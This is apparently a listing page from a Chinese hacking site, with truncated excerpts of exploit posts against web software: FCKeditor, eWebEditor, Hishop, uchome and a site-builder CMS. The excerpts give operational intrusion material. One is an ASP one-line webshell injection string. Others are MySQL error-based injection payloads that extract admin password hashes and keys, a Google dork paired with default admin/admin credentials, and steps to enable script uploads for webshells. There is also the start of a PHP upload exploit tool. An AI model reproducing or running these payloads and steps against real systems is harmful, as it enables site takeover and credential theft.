提交’时提示ip被记录 防注入系统的利用
例如: 网址:https://www.webshell.cc/newslist.asp?id=122′ 提示“你的操作已被记录!”等信息。 利用方法:https://www.webshell.cc/sqlin.asp 看是否存在,存在提交https://www.webshell.cc/newslist.asp?id=122‘excute(request("mima"))写入一句话
fckeditor 2.6.4 任意文件上传漏洞
描述:fckeditor 详细说明:currentfolder过滤不给力啊,但是GPC就能让它脑残!下面是利用工具! 利用: <? error_reporting(0); set_time_limit(0); ini_set("default_socket_timeout", 5); define(STDIN, fopen("php://stdin", "r")); $match = arr...
Hishop5.4和5.4.1 漏洞利用
hishop 自从09年 5.1 和5.1.3爆过漏洞之后就没爆了。。 前段时间看了下,找到一个注入点,不过语句有点复杂而且还过滤了下划线(表名当中都有下划线),所以需要特别构造下, 这个注入点再结合iis6就能拿shell了。 前几天看到了toby57大牛dz1.5的exp, 看的我荡漾了,所以下午花了点时间,看了下PHP,学着写了个php的exp。 大牛别笑哈。。 选这种类似的URL 拿she...
拿到服务器可以做什么?VPN首选!VPN搭建教程!
正所谓常在河边走哪有不湿脚,这几天正在想法搞VPN代理,网上搜索大把的资料来看了,并按照资料的方法自己尝试了下发现那些资料一点都不靠谱。鼓捣了半天我也没搞定VPN的架设,最多的就是架设好后能连接了,但预期的效果却没达到,发现VPN连接后不能上网了。最终还是在朋友的帮助下搞定了 windows2003单网卡环境下的VPN架设,现在就把具体方法发布给大家,希望对大家有所帮助。 要架设个属...
mysql暴错注入的科普 1
抽uchome两个老的SQL注入漏洞举例,漏洞很久以前就被人公布过了,两个SQL注入都在个人资料更新的流程里: 注册变量的代码KEY的内容直接进入了$inserts数组 foreach ($_POST['friend'] as $key => $value) { $value = intval($value); $inserts[] = "('base','$key','$sp...
mysql暴错注入的科普 2
通过前面SQL错误信息获得了表前缀,那么直接就可以爆用户名为admin的hash 向cp.php?ac=profile&op=info POST提交参数: profilesubmit=1&formhash=232d1c54&info[a',(select 1 from(select count(*),concat((SELECT concat(password) FROM ...
mysql暴错注入的科普 3
跨库爆出uckey,跨库到ucenter进行查询,这里我就不详叙了,都截图吧。 爆出数据库的个数 profilesubmit=1&formhash=232d1c54&info[a',(select 1 from(select count(*),concat((SELECT concat(substring(count(*),1,64)) F...
云起企业建站系统通杀oday
话说无聊去代码网站下套程序分析分析 可到了这个云起企业建站系统 下载数挺多的 于是乎看了起来 首先看到了它的后台login.asp文件。。一看 边觉得蛋疼。。。 if request.Form("submit")<>"" then if request.Form("userid")="" or request.Form("password")="" then response.Writ...
Flash 0day Exploit Analysis
数天前网络上爆出来利用最新“Flash媒体漏洞”挂马的攻击网页,这个漏洞影响Adobe Flash Player 10.3.183.5以下的版本,要知道在本周三之前10.3.183.5是flash最高版本,即使现在已经发布更新,但并不是每个机器都安装了更新,因为在我的自己上Adobe Flash 就没有提示安装更新。 这个漏洞是通过Flash的媒体播放功能播放一个恶意视频文件触发的。至少我知道会影...
eWebEditor5.5 漏洞
作者:脚本小子 Google搜索:inurl:xxhs.asp?classid= 漏洞eWebEditor5.5 拿webshell方法 直接进后台eWebEditor/admin/login.asp 默认账号密码 admin admin 登陆后台点击“样式管理” 在popup样式管理 修改 路径模式:选择绝对路径 图片类型:gif|jpg|jpeg|bmpasp|asa|aaspsp|cer|c...